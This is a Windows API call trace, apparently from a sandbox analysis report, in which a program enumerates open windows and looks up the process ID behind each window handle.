	[0613.955] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x14ec
	[0613.955] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfcc
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x12ac
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1484
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x934
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc0c
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb08
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x948
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1178
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x13e0
	[0613.956] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xcd0
	[0613.957] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x13fc
	[0613.957] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xdc8
	[0613.957] GetWindow (hWnd=0x105c6, uCmd=0x4) returned 0x0
	[0613.958] IsWindowVisible (hWnd=0x105c6) returned 0
	[0613.958] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc18
	[0613.958] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc2c
	[0613.958] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa1c
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1244
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xdb0
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1398
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1358
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1370
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1340
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x130c
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x12c0
	[0613.959] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x12e4
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1270
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1298
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x120c
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x122c
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x11c4
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x11b0
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1188
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1148
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1160
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10fc
	[0613.960] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe34
	[0613.961] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xea4
	[0613.961] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x514
	[0613.961] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe48
	[0613.961] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xbc8
	[0613.961] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xdf8
	[0613.961] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x318
	[0613.961] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xcac
	[0613.961] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x8bc
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf9c
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf48
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe40
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xecc
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xeb8
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe80
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe98
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe60
	[0613.962] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xee4
	[0613.963] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf00
	[0613.963] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xdf0
	[0613.963] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe1c
	[0613.963] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xdd0
	[0613.963] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xd94
	[0613.963] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xd74
	[0613.963] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xd00
	[0613.963] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xcd8
	[0613.964] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc84
	[0613.964] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xca4
	[0613.964] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc64
	[0613.964] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc24
	[0613.964] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb84
	[0613.964] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xbac
	[0613.964] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x384
	[0613.964] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xab8
	[0613.965] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x33c
	[0613.965] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa44
	[0613.965] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa64
	[0613.965] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x8a8
	[0613.965] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xaf0
	[0613.965] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x88c
	[0613.965] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb04
	[0613.965] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x910
	[0613.966] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x230
	[0613.966] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xac0
	[0613.966] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xab4
	[0613.966] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xaac
	[0613.966] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x3d0
	[0613.966] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x978
	[0613.966] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa7c
	[0613.966] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x59c
	[0613.967] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa88
	[0613.967] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa6c
	[0613.967] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa68
	[0613.967] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x9f8
	[0613.967] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa04
	[0613.967] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x924
	[0613.967] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x8dc
	[0613.967] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x7dc
	[0613.968] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x768
	[0613.968] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x764
	[0613.968] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x820
	[0613.968] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x810
	[0613.968] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x794
	[0613.968] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x83c
	[0613.968] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x7ac
	[0613.968] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb44
	[0613.969] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb5c
	[0613.969] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x838
	[0613.969] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.969] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.969] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.969] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.969] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.969] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x818
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x5b8
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x494
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1ec
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x440
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x7e8
	[0613.970] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x730
	[0613.971] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x2c8
	[0613.971] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x31c
	[0613.971] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x330
	[0613.971] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x128
	[0613.971] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x5c8
	[0613.971] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x6f8
	[0613.971] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x358
	[0613.971] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x73c
	[0613.972] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb0
	[0613.972] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x250
	[0613.972] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x240
	[0613.972] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x790
	[0613.973] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x61c
	[0613.973] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x540
	[0613.973] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x538
	[0613.973] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x568
	[0613.974] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x538
	[0613.974] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x568
	[0613.974] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x538
	[0613.974] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x540
	[0613.974] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x540
	[0613.974] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x57c
	[0613.974] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x460
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x554
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x528
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x79c
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.975] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4e0
	[0613.976] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.976] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x460
	[0613.976] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x460
	[0613.976] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x44c
	[0613.976] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x778
	[0613.976] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x460
	[0613.976] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x558
	[0613.976] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.977] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4d0
	[0613.977] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1bb4
	[0613.977] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10bc
	[0613.977] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1b50
	[0613.977] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x14b4
	[0613.977] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x149c
	[0613.977] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x14a8
	[0613.977] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1490
	[0613.978] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x14a4
	[0613.978] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x148c
	[0613.978] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1458
	[0613.978] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1b4c
	[0613.978] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1b3c
	[0613.978] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x19bc
	[0613.978] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x199c
	[0613.978] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1998
	[0613.979] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1994
	[0613.979] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1990
	[0613.979] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1984
	[0613.979] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x197c
	[0613.979] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1978
	[0613.979] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1824
	[0613.979] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1088
	[0613.979] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1908
	[0613.980] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x18cc
	[0613.980] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x18d0
	[0613.980] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1840
	[0613.980] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10c4
	[0613.980] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x128c
	[0613.980] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x16e8
	[0613.980] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x16cc
	[0613.980] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x274
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10e0
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10cc
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10c0
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x10d0
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1198
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1080
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1074
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x106c
	[0613.981] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1474
	[0613.982] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1414
	[0613.982] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xbd0
	[0613.982] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x550
